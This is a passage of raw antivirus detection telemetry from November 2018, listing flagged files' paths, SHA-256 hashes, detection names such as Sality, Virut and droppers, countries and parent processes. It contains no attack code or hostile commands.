  Row(detection=Row(filename='avscan-20181102-174844-4266882f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-173656-152C68E6\\AVSCAN-20181102-174844-4266882F', filesize=704000, name='TR/BitCoinMiner.d3bc4d.#M1.#R1'), hash='d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:48:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qtposition_geoclue.dll', filepath='C:\\Program Files\\Zaxar\\position\\qtposition_geoclue.dll', filesize=192000, name='W32/Ramnit.C.#M1.#R1'), hash='efb62f8fae89c7b56d4dba8a6c16bffd635ecdeb012d171870302e4a4c62f2ef', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T15:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172319-dad0c727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c376d199\\AVSCAN-20181102-172230-D5BF07A9\\AVSCAN-20181102-172319-DAD0C727', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avast_internet_security_setup_online.exe', filepath='C:\\Users\\X\\Desktop\\Tiago Oliveira\\Documents\\TIAGO\\avast_internet_security_setup_online.exe', filesize=4768000, name='TR/Patched.Gen.#M300.#R2478'), hash='d0a46a5fd508e7e51633d25dd04432db9b7595db5d676d946f44c57fa29875c7', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:o3zeyReqYUqYlv53.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T18:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='C:\\Program Files\\PS2\\DarkWatch\\Start.exe', filesize=384000, name='W32/Induc.blr.#M1.#R1'), hash='ff0d467e79f866ad5236fa5ab416d25d62a028d787cf5118243fc907f518e178', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:905Qo9z8R0qnK8e3.1', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T03:28:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154808-cfd8e1dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e284725\\AVSCAN-20181102-154725-C9F21634\\AVSCAN-20181102-154808-CFD8E1DC', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:48:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161630-2c7bc51f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3cde752e\\AVSCAN-20181102-161540-25298504\\AVSCAN-20181102-161630-2C7BC51F', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{48EEE9A4-A8D0-4C3E-889B-98538B3F25F3}_0\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='cd1d94576de2110d999573fd0c78764ea926228612174a2ca86297922ade47e4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:yVnqqT+fsU2Th8nb.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=67816, timestamp='2018-11-02T11:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Users\\X\\downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='--engine=2 --session-id=BkiCPrjXm1IBseCDB9r8RecX69KRYQJppJK\\\\\\/TOC1 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T15:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T02:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='b7b80af290cc9bbc0b32e83b66d500dad7957d3ec71046dd8adb8a17cbd0576e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:05:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101954-9dfe57e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101954-9DFE57E8', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110854-d01a9ab7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110854-D01A9AB7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042150-56c8eac1', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-042150-56C8EAC1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rual62v.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-3838400726-2184387064-1909925687-1001\\$RUAL62V.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T15:37:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T09:25:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st4.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST4\\ST4.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='daae94b24cc0953acc0981f8c6ffb0e3b439c394f41f3a31e19f5cf11b05b7c2', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.kjvwd.#M0.#R0'), hash='e6fc333e96f2bf01b233da4c04eb648168ec1f8b12f53c11b61c24579404b6c8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='label_84884476.doc', filepath='C:\\TMP\\01\\_virs\\label_84884476.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238f93', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238f93', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ece0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ece0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:07:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000c817', filepath='C:\\Windows\\Temp\\20b44ad0-d48c-41e5-8115-9912b5f11a73\\tmp000001cf\\tmp0000c817', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='f7db85be546844c768eeed196e3cf2c4b9260953dba1fd983ce1a9785ae99acf', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T13:00:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b174', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b174', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296b5c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296b5c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:32:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124430-88039144', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61cd44c7\\AVSCAN-20181104-124308-763F0A28\\AVSCAN-20181104-124430-88039144', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d0a8', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d0a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:44:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\3582-490\\\\\\\\DfsdkS.exe\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-04T16:08:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsfCF0D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:42:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E39A45BD02DDDDE6E513E3570D59FB25560D8C311824D3694758ED30B35555AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:50:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FDFDF7FDBA20713FFF6CE3FC3F40BC19D3944C51017887291A84BCB28083CD42', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='fdfdf7fdba20713fff6ce3fc3f40bc19d3944c51017887291a84bcb28083cd42', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:14:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel Chipsets driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='ff15b60196808f4c4d4aff891a80adc14e3dc06a6600d8cae379923f187ab05b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251e8d', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251e8d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:35:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:53:09Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-02T04:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f1d3d.exe', filepath='H:\\GAMES\\العاب\\عربيات فورمالا 1\\F1d3d.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='28d6b77a9347e43d8ffd34ce36151204896291908ac4410b58cf7c6260c48955', metadata=Row(cmdline='Copy *\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\TeraCopy\\\\\\\\FileList.dat\\\\\\" \\\\\\"K:\\\\\\\\\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\TeraCopy\\TeraCopy.exe', parentsize=3345552, timestamp='2018-11-02T14:44:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mssys.exe', filepath='C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System\\sys\\syscon\\mssys.exe', parentsize=1024000, timestamp='2018-11-02T19:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage3_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE3_SE\\STAGE3_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:18:53Z'), dt=datetime.date(2018, 11, 2)),
